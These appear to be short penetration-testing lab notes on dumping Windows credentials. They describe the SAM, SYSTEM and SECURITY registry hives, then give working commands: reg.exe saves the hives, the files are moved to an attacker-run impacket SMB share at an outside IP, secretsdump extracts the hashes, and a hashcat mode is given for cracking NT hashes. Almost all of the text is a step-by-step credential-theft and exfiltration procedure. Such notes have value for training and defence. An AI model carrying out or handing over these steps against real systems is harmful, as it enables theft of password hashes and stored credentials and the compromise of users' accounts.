Registry hives:
| Registry Hive | Description |
|---|---|
HKLM\\SAM |
Contains password hashes for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords. |
HKLM\\SYSTEM |
Stores the system boot key, which is used to encrypt the SAM database. This key is required to decrypt the hashes. |
HKLM\\SECURITY |
Contains |
| sensitive information used by the Local Security Authority (LSA), | |
| including cached domain credentials (DCC2), cleartext passwords, DPAPI | |
| keys, and more. |
Can be backupped via reg.exe utility
Example:
C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save
The operation completed successfully.
C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save
The operation completed successfully.
C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save
The operation completed successfully.
On host:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
Then:
C:\\> move sam.save \\\\10.10.15.16\\CompData
1 file(s) moved.
C:\\> move security.save \\\\10.10.15.16\\CompData
1 file(s) moved.
C:\\> move system.save \\\\10.10.15.16\\CompData
1 file(s) moved.
To dump with secretsdump:
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Then hashcat mode for NT hash is -m 1000
hklm\security contains cached domain logon information, in the form of DCC2 hashes.